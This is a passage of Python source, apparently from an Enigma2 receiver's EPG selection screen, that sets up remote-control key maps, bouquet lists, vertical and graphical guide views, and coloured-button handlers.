(self.keyNumberGlobal, _('page left')), '5': (self.keyNumberGlobal, _('Jump to current time')), '6': (self.keyNumberGlobal, _('Page right')), '7': (self.keyNumberGlobal, _('No of items switch (increase or reduced)')), '8': (self.keyNumberGlobal, _('Page down')), '9': (self.keyNumberGlobal, _('Jump to prime time')), '0': (self.keyNumberGlobal, _('Move to home of list')) }, -1) self['input_actions'].csel = self elif self.type == EPG_TYPE_MULTI: self.skinName = 'EPGSelectionMulti' self['bouquetlist'] = EPGBouquetList(graphic=graphic) self['bouquetlist'].hide() self['now_button'] = Pixmap() self['next_button'] = Pixmap() self['more_button'] = Pixmap() self['now_button_sel'] = Pixmap() self['next_button_sel'] = Pixmap() self['more_button_sel'] = Pixmap() self['now_text'] = Label() self['next_text'] = Label() self['more_text'] = Label() self['date'] = Label() self.bouquetlist_active = False self['bouquetokactions'] = HelpableActionMap(self, 'OkCancelActions', { 'OK': (self.BouquetOK, _('Change to bouquet')), }, -1) self['bouquetokactions'].csel = self self["bouquetokactions"].setEnabled(False) self['bouquetcursoractions'] = HelpableActionMap(self, 'DirectionActions', { 'left': (self.moveBouquetPageUp, _('Goto previous event')), 'right': (self.moveBouquetPageDown, _('Goto next event')), 'up': (self.moveBouquetUp, _('Goto previous channel')), 'down': (self.moveBouquetDown, _('Goto next channel')) }, -1) self['bouquetcursoractions'].csel = self self['bouquetcursoractions'].setEnabled(False) self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions', { 'left': (self.leftPressed, _('Goto previous event')), 'right': (self.rightPressed, _('Goto next event')), 'up': (self.moveUp, _('Goto previous channel')), 'down': (self.moveDown, _('Goto next channel')) }, -1) self['epgcursoractions'].csel = self self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions', { 'nextService': (self.nextPage, _('Move down a page')), 'prevService': (self.prevPage, _('Move up a page')), 'nextBouquet': (self.nextBouquet, _('Goto next bouquet')), 'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')), 'input_date_time': (self.enterDateTime, _('Goto specific data/time')), 'epg': (self.epgButtonPressed, _('Show single epg for current channel')), 'info': (self.Info, _('Show detailed event info')), 'infolong': (self.InfoLong, _('Show single epg for current channel')), 'tv': (self.Bouquetlist, _('Toggle between bouquet/epg lists')), 'menu': (self.createSetup, _('Setup menu')) }, -1) self['epgactions'].csel = self elif self.type == EPG_TYPE_VERTICAL: if config.epgselection.vertical_pig.value: self.Fields = 4 self.skinName = 'EPGverticalPIG' else: self.Fields = 6 self.skinName = 'EPGvertical' self['bouquetlist'] = EPGBouquetList(graphic=graphic) self['bouquetlist'].hide() self["list"] = MenuList([ ]) self["piconCh1"] = ServiceEvent() self["piconCh2"] = ServiceEvent() self["piconCh3"] = ServiceEvent() self["piconCh4"] = ServiceEvent() self["piconCh5"] = ServiceEvent() self["currCh1"] = Label(" ") self["currCh2"] = Label(" ") self["currCh3"] = Label(" ") self["currCh4"] = Label(" ") self["currCh5"] = Label(" ") self["Active1"] = Label(" ") self["Active2"] = Label(" ") self["Active3"] = Label(" ") self["Active4"] = Label(" ") self["Active5"] = Label(" ") self["list1"] = EPGList(type = EPG_TYPE_VERTICAL, selChangedCB = self.onSelectionChanged, timer = session.nav.RecordTimer) self["list2"] = EPGList(type = EPG_TYPE_VERTICAL, selChangedCB = self.onSelectionChanged, timer = session.nav.RecordTimer) self["list3"] = EPGList(type = EPG_TYPE_VERTICAL, selChangedCB = self.onSelectionChanged, timer = session.nav.RecordTimer) self["list4"] = EPGList(type = EPG_TYPE_VERTICAL, selChangedCB = self.onSelectionChanged, timer = session.nav.RecordTimer) self["list5"] = EPGList(type = EPG_TYPE_VERTICAL, selChangedCB = self.onSelectionChanged, timer = session.nav.RecordTimer) self['bouquetokactions'] = HelpableActionMap(self, 'OkCancelActions', { 'cancel': (self.BouquetlistHide, _('Close bouquet list.')), 'OK': (self.BouquetOK, _('Change to bouquet')), }, -1) self['bouquetokactions'].csel = self self["bouquetokactions"].setEnabled(False) self['bouquetcursoractions'] = HelpableActionMap(self, 'DirectionActions', { 'left': (self.moveBouquetPageUp, _('Goto previous event')), 'right': (self.moveBouquetPageDown, _('Goto next event')), 'up': (self.moveBouquetUp, _('Goto previous channel')), 'down': (self.moveBouquetDown, _('Goto next channel')) }, -1) self['bouquetcursoractions'].csel = self self["bouquetcursoractions"].setEnabled(False) self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions', { 'left': (self.leftPressed, _('Goto previous event')), 'right': (self.rightPressed, _('Goto next event')), 'up': (self.moveUp, _('Goto previous channel')), 'down': (self.moveDown, _('Goto next channel')) }, -1) self['epgcursoractions'].csel = self self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions', { 'nextService': (self.nextPage, _('jump to next page or all up (setup in menu)')), 'prevService': (self.prevPage, _('jump to previous page or all down (setup in menu)')), 'nextBouquet': (self.nextBouquet, _('Goto next bouquet')), 'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')), 'input_date_time': (self.enterDateTime, _('Goto specific data/time')), 'epg': (self.epgButtonPressed, _('Show single epg for current channel')), 'info': (self.Info, _('Show detailed event info (setup in menu)')), 'infolong': (self.InfoLong, _('Show single epg for current channel (setup in menu)')), 'tv': (self.Bouquetlist, _('Toggle between bouquet/epg lists')), 'tvlong': (self.togglePIG, _('Toggle Picture In Graphics')), 'menu': (self.createSetup, _('Setup menu')) }, -1) self['input_actions'] = HelpableNumberActionMap(self, 'NumberActions', { '1': (self.keyNumberGlobal, _('goto first channel')), '2': (self.keyNumberGlobal, _('all events up')), '3': (self.keyNumberGlobal, _('goto last channel')), '4': (self.keyNumberGlobal, _('previous channel page')), '0': (self.keyNumberGlobal, _('goto current channel and now')), '6': (self.keyNumberGlobal, _('next channel page')), '7': (self.keyNumberGlobal, _('goto now')), '8': (self.keyNumberGlobal, _('all events down')), '9': (self.keyNumberGlobal, _('Goto Primetime')), '5': (self.keyNumberGlobal, _('Set Basetime')) }, -1) if self.type == EPG_TYPE_GRAPH: time_epoch=int(config.epgselection.graph_prevtimeperiod.value) elif self.type == EPG_TYPE_INFOBARGRAPH: time_epoch=int(config.epgselection.infobar_prevtimeperiod.value) else: time_epoch=None if self.type != EPG_TYPE_VERTICAL: self['list'] = EPGList(type=self.type, selChangedCB=self.onSelectionChanged, timer=session.nav.RecordTimer, time_epoch=time_epoch, overjump_empty=config.epgselection.overjump.value, graphic=graphic) self.onLayoutFinish.append(self.LayoutFinish) self.refreshTimer = eTimer() self.refreshTimer.timeout.get().append(self.refreshlist) def createSetup(self): self.closeEventViewDialog() key = None if self.type == EPG_TYPE_SINGLE: key = 'epgsingle' elif self.type == EPG_TYPE_MULTI: key = 'epgmulti' elif self.type == EPG_TYPE_ENHANCED: key = 'epgenhanced' elif self.type == EPG_TYPE_INFOBAR: key = 'epginfobar' elif self.type == EPG_TYPE_GRAPH: key = 'epggraphical' elif self.type == EPG_TYPE_INFOBARGRAPH: key = 'epginfobargraphical' elif self.type == EPG_TYPE_VERTICAL: key = 'epgvertical' if key: self.session.openWithCallback(self.onSetupClose, Setup, key) def onSetupClose(self, test = None): if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if self.type == EPG_TYPE_GRAPH: self.close('reopengraph') elif self.type == EPG_TYPE_INFOBARGRAPH: self.close('reopeninfobargraph') elif self.type == EPG_TYPE_INFOBAR: self.close('reopeninfobar') elif self.type == EPG_TYPE_VERTICAL: self.close('reopenvertical') def togglePIG(self): if self.type == EPG_TYPE_VERTICAL: if not config.epgselection.vertical_pig.value: config.epgselection.vertical_pig.setValue(True) else: config.epgselection.vertical_pig.setValue(False) config.epgselection.vertical_pig.save() configfile.save() self.close('reopenvertical') return if not config.epgselection.graph_pig.value: config.epgselection.graph_pig.setValue(True) else: config.epgselection.graph_pig.setValue(False) config.epgselection.graph_pig.save() configfile.save() self.close('reopengraph') def getBouquetServices(self, bouquet): services = [] servicelist = eServiceCenter.getInstance().list(bouquet) if not servicelist is None: while True: service = servicelist.getNext() if not service.valid(): #check if end of list break if service.flags & (eServiceReference.isDirectory | eServiceReference.isMarker): #ignore non playable services continue services.append(ServiceReference(service)) return services def LayoutFinish(self): self.createTimer = eTimer() self.createTimer.start(500, True) self['lab1'].show() self.onCreate() def onCreate(self): title = None self.BouquetRoot = False serviceref = self.session.nav.getCurrentlyPlayingServiceOrGroup() if self.type != EPG_TYPE_VERTICAL: self['list'].recalcEntrySize() if self.type == EPG_TYPE_VERTICAL: self.ask_time = -1 self.lastEventTime = (time(), time()+3600) self.BouquetRoot = False if self.StartBouquet.toString().startswith('1:7:0'): self.BouquetRoot = True self.services = self.getBouquetServices(self.StartBouquet) self['bouquetlist'].recalcEntrySize() self['bouquetlist'].fillBouquetList(self.bouquets) self['bouquetlist'].moveToService(self.StartBouquet) self['bouquetlist'].setCurrentBouquet(self.StartBouquet) self.setTitle(self['bouquetlist'].getCurrentBouquet()) self["list"].setList(self.getChannels()) if self.servicelist: service = ServiceReference(self.servicelist.getCurrentSelection()) info = service and service.info() nameROH = info and info.getName(service.ref).replace('\xc2\x86', '').replace('\xc2\x87', '') else: service = self.session.nav.getCurrentService() info = service and service.info() nameROH = info and info.getName().replace('\xc2\x86', '').replace('\xc2\x87', '') if (nameROH is not None) and not ('channel1' in config.epgselection.vertical_startmode.value): idx=0 for channel in self.myServices: idx+=1 if channel[1] == nameROH: break page = idx/(self.Fields-1) row = idx%(self.Fields-1) if row: self.activeList = row else: page-=1 self.activeList = self.Fields-1 self["list"].moveToIndex(0) for i in range(0, page): self["list"].pageDown() else: self["list"].moveToIndex(0) self['Service'].newService(service.ref) if self.firststart and 'primetime' in config.epgselection.vertical_startmode.value: self.gotoPrimetime() else: self.updateVerticalEPG() self.firststart = False elif self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH or self.type == EPG_TYPE_MULTI: if self.StartBouquet.toString().startswith('1:7:0'): self.BouquetRoot = True self.services = self.getBouquetServices(self.StartBouquet) self['bouquetlist'].recalcEntrySize() self['bouquetlist'].fillBouquetList(self.bouquets) self['bouquetlist'].moveToService(self.StartBouquet) self['bouquetlist'].setCurrentBouquet(self.StartBouquet ) self.setTitle(self['bouquetlist'].getCurrentBouquet()) if self.type == EPG_TYPE_MULTI: self['list'].fillMultiEPG(self.services, self.ask_time) else: self['list'].fillGraphEPG(self.services, self.ask_time) self['list'].setCurrentlyPlaying(serviceref) self['list'].moveToService(serviceref) if self.type != EPG_TYPE_MULTI: self['list'].fillGraphEPG(None, self.ask_time, True) if self.type == EPG_TYPE_GRAPH: self['list'].setShowServiceMode(config.epgselection.graph_servicetitle_mode.value) self.moveTimeLines() if 'channel1' in config.epgselection.graph_startmode.value: self['list'].instance.moveSelectionTo(0) elif self.type == EPG_TYPE_INFOBARGRAPH: self['list'].setShowServiceMode(config.epgselection.infobar_servicetitle_mode.value) self.moveTimeLines() elif self.type == EPG_TYPE_SINGLE or self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR: if self.type == EPG_TYPE_SINGLE: service = self.currentService elif self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR: service = ServiceReference(self.servicelist.getCurrentSelection()) title = ServiceReference(self.servicelist.getRoot()).getServiceName() self['Service'].newService(service.ref) if title: title = title + ' - ' + service.getServiceName() else: title = service.getServiceName() self.setTitle(title) self['list'].fillSingleEPG(service) self['list'].sortSingleEPG(int(config.epgselection.sort.value)) else: self['list'].fillSimilarList(self.currentService, self.eventid) self['lab1'].hide() def refreshlist(self): self.refreshTimer.stop() if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: self.ask_time = self['list'].getTimeBase() self['list'].fillGraphEPG(None, self.ask_time) self.moveTimeLines() elif self.type == EPG_TYPE_MULTI: curr = self['list'].getCurrentChangeCount() self['list'].fillMultiEPG(self.services, self.ask_time) for i in range(curr): self['list'].updateMultiEPG(1) elif self.type == EPG_TYPE_SINGLE or self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR: try: if self.type == EPG_TYPE_SINGLE: service = self.currentService elif self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR: service = ServiceReference(self.servicelist.getCurrentSelection()) if not self.cureventindex: index = self['list'].getCurrentIndex() else: index = self.cureventindex self.cureventindex = None self['list'].fillSingleEPG(service) self['list'].sortSingleEPG(int(config.epgselection.sort.value)) self['list'].setCurrentIndex(index) except: pass elif self.type == EPG_TYPE_VERTICAL: curr = self['list'+str(self.activeList)].getSelectedEventId() currPrg = self.myServices[self.getActivePrg()] l = self['list'+str(self.activeList)] l.recalcEntrySize() service = ServiceReference(currPrg[0]) stime = None if self.ask_time > time(): stime = self.ask_time l.fillSingleEPG(service, stime) self['list'+str(self.activeList)].moveToEventId(curr) def moveUp(self): if self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_updownbtn.value: if self.getEventTime(self.activeList)[0] is None: return self.saveLastEventTime() idx = self['list'+str(self.activeList)].getCurrentIndex() if not idx: tmp = self.lastEventTime self.setMinus24h(True, 6) self.lastEventTime = tmp self.gotoLasttime() elif config.epgselection.vertical_updownbtn.value: if not idx % config.epgselection.vertical_itemsperpage.value: self.syncUp(idx) self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveUp) if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: self.moveTimeLines(True) if self.type == EPG_TYPE_VERTICAL: self.saveLastEventTime() def moveDown(self): if self.type == EPG_TYPE_VERTICAL and config.epgselection.vertical_updownbtn.value: idx = self['list'+str(self.activeList)].getCurrentIndex() if not (idx+1) % config.epgselection.vertical_itemsperpage.value: self.syncDown(idx+1) self['list'+str(self.activeList)].moveTo(self['list'+str(self.activeList)].instance.moveDown) if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: self.moveTimeLines(True) if self.type == EPG_TYPE_VERTICAL: self.saveLastEventTime() def updEvent(self, dir, visible = True): ret = self['list'].selEntry(dir, visible) if ret: self.moveTimeLines(True) if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: self.moveTimeLines(True) def nextPage(self, numberkey=False, reverse = False): if self.type == EPG_TYPE_VERTICAL: if not numberkey and 'scroll' in config.epgselection.vertical_channelbtn.value: if config.epgselection.vertical_channelbtn_invert.value: self.allDown() else: self.allUp() elif not numberkey and '24' in config.epgselection.vertical_channelbtn.value: if config.epgselection.vertical_channelbtn_invert.value: self.setPlus24h() else: self.setMinus24h() else: if not numberkey: if not reverse and config.epgselection.vertical_channelbtn_invert.value: self.prevPage(reverse = True) return if len(self.list) <= self["list"].getSelectionIndex() + self.Fields-1: self.gotoFirst() else: self["list"].pageDown() self.activeList = 1 self.updateVerticalEPG() self.gotoLasttime() else: self['list'].moveTo(self['list'].instance.pageDown) def prevPage(self, numberkey=False, reverse = False): if self.type == EPG_TYPE_VERTICAL: if not numberkey and 'scroll' in config.epgselection.vertical_channelbtn.value: if config.epgselection.vertical_channelbtn_invert.value: self.allUp() else: self.allDown() elif not numberkey and '24' in config.epgselection.vertical_channelbtn.value: if config.epgselection.vertical_channelbtn_invert.value: self.setMinus24h() else: self.setPlus24h() else: if not numberkey: if not reverse and config.epgselection.vertical_channelbtn_invert.value: self.nextPage(reverse = True) return if not self["list"].getSelectionIndex(): self.gotoLast() else: self['list'].pageUp() self.activeList = (self.Fields-1) self.updateVerticalEPG() self.gotoLasttime() else: self['list'].moveTo(self['list'].instance.pageUp) def toTop(self): self['list'].moveTo(self['list'].instance.moveTop) def toEnd(self): self['list'].moveTo(self['list'].instance.moveEnd) def leftPressed(self): if self.type == EPG_TYPE_VERTICAL: first = not self["list"].getSelectionIndex() and self.activeList == 1 if self.activeList > 1 and not first: self.activeList -= 1 self.displayActiveEPG() else: if first: self.gotoLast() else: self["list"].pageUp() self.activeList = (self.Fields-1) self.updateVerticalEPG() self.gotoLasttime() self.onSelectionChanged() elif self.type == EPG_TYPE_MULTI: self['list'].updateMultiEPG(-1) else: self.updEvent(-1) def rightPressed(self): if self.type == EPG_TYPE_VERTICAL: end = len(self.list) == self["list"].getSelectionIndex() + self.activeList if self.activeList < (self.Fields-1) and not end: self.activeList += 1 self.displayActiveEPG() else: if end: self.gotoFirst() else: self["list"].pageDown() self.activeList = 1 self.updateVerticalEPG() self.gotoLasttime() self.onSelectionChanged() elif self.type == EPG_TYPE_MULTI: self['list'].updateMultiEPG(1) else: self.updEvent(+1) def Bouquetlist(self): if not self.bouquetlist_active: self.BouquetlistShow() else: self.BouquetlistHide() def BouquetlistShow(self): self.curindex = self['bouquetlist'].l.getCurrentSelectionIndex() self["epgcursoractions"].setEnabled(False) self["okactions"].setEnabled(False) self['bouquetlist'].show() self["bouquetokactions"].setEnabled(True) self["bouquetcursoractions"].setEnabled(True) self.bouquetlist_active = True def BouquetlistHide(self, cancel=True): self["bouquetokactions"].setEnabled(False) self["bouquetcursoractions"].setEnabled(False) self['bouquetlist'].hide() if cancel: self['bouquetlist'].setCurrentIndex(self.curindex) self["okactions"].setEnabled(True) self["epgcursoractions"].setEnabled(True) self.bouquetlist_active = False def getCurrentBouquet(self): if self.BouquetRoot: return self.StartBouquet elif 'bouquetlist' in self: cur = self["bouquetlist"].l.getCurrentSelection() return cur and cur[1] else: return self.servicelist.getRoot() def BouquetOK(self): self.BouquetRoot = False self.services = self.getBouquetServices(self.getCurrentBouquet()) if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if self.type == EPG_TYPE_GRAPH: now = time() - int(config.epgselection.graph_histminutes.value) * 60 self.ask_time = now - now % (int(config.epgselection.graph_roundto.value) * 60) if 'primetime' in config.epgselection.graph_startmode.value: basetime = localtime(self.ask_time) basetime = (basetime[0], basetime[1], basetime[2], int(config.epgselection.graph_primetimehour.value), int(config.epgselection.graph_primetimemins.value), 0, basetime[6], basetime[7], basetime[8]) self.ask_time = mktime(basetime) if self.ask_time + 3600 < time(): self.ask_time += 86400 elif self.type == EPG_TYPE_INFOBARGRAPH: now = time() - int(config.epgselection.infobar_histminutes.value) * 60 self.ask_time = now - now % (int(config.epgselection.infobar_roundto.value) * 60) self['list'].resetOffset() self['list'].fillGraphEPG(self.services, self.ask_time) self.moveTimeLines(True) elif self.type == EPG_TYPE_MULTI: self['list'].fillMultiEPG(self.services, self.ask_time) if self.type == EPG_TYPE_VERTICAL: self["list"].setList(self.getChannels()) self.gotoFirst() else: self['list'].instance.moveSelectionTo(0) if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: self['list'].fillGraphEPG(None, self.ask_time, True) self.setTitle(self['bouquetlist'].getCurrentBouquet()) self.BouquetlistHide(False) def moveBouquetUp(self): self['bouquetlist'].moveTo(self['bouquetlist'].instance.moveUp) self['bouquetlist'].fillBouquetList(self.bouquets) def moveBouquetDown(self): self['bouquetlist'].moveTo(self['bouquetlist'].instance.moveDown) self['bouquetlist'].fillBouquetList(self.bouquets) def moveBouquetPageUp(self): self['bouquetlist'].moveTo(self['bouquetlist'].instance.pageUp) self['bouquetlist'].fillBouquetList(self.bouquets) def moveBouquetPageDown(self): self['bouquetlist'].moveTo(self['bouquetlist'].instance.pageDown) self['bouquetlist'].fillBouquetList(self.bouquets) def nextBouquet(self): if self.type == EPG_TYPE_MULTI or self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH or self.type == EPG_TYPE_VERTICAL: self.moveBouquetDown() self.BouquetOK() elif (self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR) and config.usage.multibouquet.value: self.CurrBouquet = self.servicelist.getCurrentSelection() self.CurrService = self.servicelist.getRoot() self.servicelist.nextBouquet() self.onCreate() def prevBouquet(self): if self.type == EPG_TYPE_MULTI or self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH or self.type == EPG_TYPE_VERTICAL: self.moveBouquetUp() self.BouquetOK() elif (self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR) and config.usage.multibouquet.value: self.CurrBouquet = self.servicelist.getCurrentSelection() self.CurrService = self.servicelist.getRoot() self.servicelist.prevBouquet() self.onCreate() def nextService(self): if self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR: self.CurrBouquet = self.servicelist.getCurrentSelection() self.CurrService = self.servicelist.getRoot() self['list'].instance.moveSelectionTo(0) if self.servicelist.inBouquet(): prev = self.servicelist.getCurrentSelection() if prev: prev = prev.toString() while True: if config.usage.quickzap_bouquet_change.value and self.servicelist.atEnd(): self.servicelist.nextBouquet() else: self.servicelist.moveDown() cur = self.servicelist.getCurrentSelection() if not cur or (not (cur.flags & 64)) or cur.toString() == prev: break else: self.servicelist.moveDown() if self.isPlayable(): self.onCreate() if not self['list'].getCurrent()[1] and config.epgselection.overjump.value: self.nextService() else: self.nextService() elif self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: self.updEvent(+24) elif self.serviceChangeCB: self.serviceChangeCB(1, self) def prevService(self): if self.type == EPG_TYPE_ENHANCED or self.type == EPG_TYPE_INFOBAR: self.CurrBouquet = self.servicelist.getCurrentSelection() self.CurrService = self.servicelist.getRoot() self['list'].instance.moveSelectionTo(0) if self.servicelist.inBouquet(): prev = self.servicelist.getCurrentSelection() if prev: prev = prev.toString() while True: if config.usage.quickzap_bouquet_change.value: if self.servicelist.atBegin(): self.servicelist.prevBouquet() self.servicelist.moveUp() cur = self.servicelist.getCurrentSelection() if not cur or (not (cur.flags & 64)) or cur.toString() == prev: break else: self.servicelist.moveUp() if self.isPlayable(): self.onCreate() if not self['list'].getCurrent()[1] and config.epgselection.overjump.value: self.prevService() else: self.prevService() elif self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: self.updEvent(-24) elif self.serviceChangeCB: self.serviceChangeCB(-1, self) def enterDateTime(self): global mepg_config_initialized if self.type == EPG_TYPE_MULTI: if not mepg_config_initialized: config.misc.prev_mepg_time = ConfigClock(default=time()) mepg_config_initialized = True self.session.openWithCallback(self.onDateTimeInputClosed, TimeDateInput, config.misc.prev_mepg_time) elif self.type == EPG_TYPE_GRAPH: self.session.openWithCallback(self.onDateTimeInputClosed, TimeDateInput, config.epgselection.graph_prevtime) elif self.type == EPG_TYPE_INFOBARGRAPH: self.session.openWithCallback(self.onDateTimeInputClosed, TimeDateInput, config.epgselection.infobar_prevtime) elif self.type == EPG_TYPE_VERTICAL: self.session.openWithCallback(self.onDateTimeInputClosed, TimeDateInput, config.epgselection.vertical_prevtime) def onDateTimeInputClosed(self, ret): if len(ret) > 1: if ret[0]: self.ask_time = ret[1] if self.type == EPG_TYPE_MULTI: self['list'].fillMultiEPG(self.services, self.ask_time) elif self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if self.type == EPG_TYPE_GRAPH: self.ask_time -= self.ask_time % (int(config.epgselection.graph_roundto.value) * 60) elif self.type == EPG_TYPE_INFOBARGRAPH: self.ask_time -= self.ask_time % (int(config.epgselection.infobar_roundto.value) * 60) l = self['list'] l.resetOffset() l.fillGraphEPG(None, self.ask_time) self.moveTimeLines(True) elif EPG_TYPE_VERTICAL: if self.ask_time > time(): self.updateVerticalEPG() else: self.ask_time = -1 if self.eventviewDialog and (self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH): self.infoKeyPressed(True) def infoKeyPressed(self, eventviewopen=False): cur = self['list'+str(self.activeList)].getCurrent() event = cur[0] service = cur[1] if event is not None and not self.eventviewDialog and not eventviewopen: if self.type != EPG_TYPE_SIMILAR: if self.type == EPG_TYPE_INFOBARGRAPH: self.eventviewDialog = self.session.instantiateDialog(EventViewSimple, event, service, skin='InfoBarEventView') self.eventviewDialog.show() else: self.session.open(EventViewEPGSelect, event, service, callback=self.eventViewCallback, similarEPGCB=self.openSimilarList) elif self.eventviewDialog and not eventviewopen: self.eventviewDialog.hide() del self.eventviewDialog self.eventviewDialog = None elif event is not None and self.eventviewDialog and eventviewopen: if self.type != EPG_TYPE_SIMILAR: if self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_INFOBARGRAPH: self.eventviewDialog.hide() self.eventviewDialog = self.session.instantiateDialog(EventViewSimple, event, service, skin='InfoBarEventView') self.eventviewDialog.show() def redButtonPressed(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if not InfoBarInstance.LongButtonPressed: if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if config.epgselection.graph_red.value == "24plus": self.nextService() if config.epgselection.graph_red.value == "24minus": self.prevService() if config.epgselection.graph_red.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.graph_red.value == "imdb" or config.epgselection.graph_red.value == None: self.openIMDb() if config.epgselection.graph_red.value == "autotimer": self.addAutoTimer() if config.epgselection.graph_red.value == "bouquetlist": self.Bouquetlist() if config.epgselection.graph_red.value == "epgsearch": self.openEPGSearch() if config.epgselection.graph_red.value == "showmovies": self.showMovieSelection() if config.epgselection.graph_red.value == "record": self.RecordTimerQuestion() if config.epgselection.graph_red.value == "gotodatetime": self.enterDateTime() if config.epgselection.graph_red.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self.nextPage() if config.epgselection.graph_red.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self.prevPage() if config.epgselection.graph_red.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self.nextBouquet() if config.epgselection.graph_red.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH: self.prevBouquet() elif self.type == EPG_TYPE_VERTICAL: if config.epgselection.vertical_red.value == "24plus": self.setPlus24h() if config.epgselection.vertical_red.value == "24minus": self.setMinus24h() if config.epgselection.vertical_red.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.vertical_red.value == "imdb" or config.epgselection.vertical_red.value == None: self.openIMDb() if config.epgselection.vertical_red.value == "autotimer": self.addAutoTimer() if config.epgselection.vertical_red.value == "bouquetlist": self.Bouquetlist() if config.epgselection.vertical_red.value == "epgsearch": self.openEPGSearch() if config.epgselection.vertical_red.value == "showmovies": self.showMovieSelection() if config.epgselection.vertical_red.value == "record": self.RecordTimerQuestion() if config.epgselection.vertical_red.value == "gotoprimetime": self.gotoPrimetime() if config.epgselection.vertical_red.value == "setbasetime": self.setBasetime() if config.epgselection.vertical_red.value == "gotodatetime": self.enterDateTime() else: self.openIMDb() def redButtonPressedLong(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if InfoBarInstance.LongButtonPressed: self.sortEpg() def greenButtonPressed(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if not InfoBarInstance.LongButtonPressed: if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if config.epgselection.graph_green.value == "24plus": self.nextService() if config.epgselection.graph_green.value == "24minus": self.prevService() if config.epgselection.graph_green.value == "timer" or config.epgselection.graph_green.value == None: self.RecordTimerQuestion(True) if config.epgselection.graph_green.value == "imdb": self.openIMDb() if config.epgselection.graph_green.value == "autotimer": self.addAutoTimer() if config.epgselection.graph_green.value == "bouquetlist": self.Bouquetlist() if config.epgselection.graph_green.value == "epgsearch": self.openEPGSearch() if config.epgselection.graph_green.value == "showmovies": self.showMovieSelection() if config.epgselection.graph_green.value == "record": self.RecordTimerQuestion() if config.epgselection.graph_green.value == "gotodatetime": self.enterDateTime() if config.epgselection.graph_green.value == "nextpage" and self.type == EPG_TYPE_GRAPH: self.nextPage() if config.epgselection.graph_green.value == "prevpage" and self.type == EPG_TYPE_GRAPH: self.prevPage() if config.epgselection.graph_green.value == "nextbouquet" and self.type == EPG_TYPE_GRAPH: self.nextBouquet() if config.epgselection.graph_green.value == "prevbouquet" and self.type == EPG_TYPE_GRAPH: self.prevBouquet() elif self.type == EPG_TYPE_VERTICAL: if config.epgselection.vertical_green.value == "24plus": self.setPlus24h() if config.epgselection.vertical_green.value == "24minus": self.setMinus24h() if config.epgselection.vertical_green.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.vertical_green.value == "imdb" or config.epgselection.vertical_green.value == None: self.openIMDb() if config.epgselection.vertical_green.value == "autotimer": self.addAutoTimer() if config.epgselection.vertical_green.value == "bouquetlist": self.Bouquetlist() if config.epgselection.vertical_green.value == "epgsearch": self.openEPGSearch() if config.epgselection.vertical_green.value == "showmovies": self.showMovieSelection() if config.epgselection.vertical_green.value == "record": self.RecordTimerQuestion() if config.epgselection.vertical_green.value == "gotoprimetime": self.gotoPrimetime() if config.epgselection.vertical_green.value == "setbasetime": self.setBasetime() if config.epgselection.vertical_green.value == "gotodatetime": self.enterDateTime() else: self.RecordTimerQuestion(True) def greenButtonPressedLong(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if InfoBarInstance.LongButtonPressed: self.showTimerList() def yellowButtonPressed(self): self.closeEventViewDialog() from Screens.InfoBar import InfoBar InfoBarInstance = InfoBar.instance if not InfoBarInstance.LongButtonPressed: if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH: if config.epgselection.graph_yellow.value == "24plus": self.nextService() if config.epgselection.graph_yellow.value == "24minus": self.prevService() if config.epgselection.graph_yellow.value == "timer": self.RecordTimerQuestion(True) if config.epgselection.graph_yellow.value == "imdb": self.openIMDb() if config.epgselection.graph_yellow.value == "autotimer": self.addAutoTimer() if config.epgselection.graph_yellow.value == "bouquetlist": self.Bouquetlist() if config.epgselection.graph_yellow.value == "epgsearch" or config.epgselection.graph_yellow.value == None: 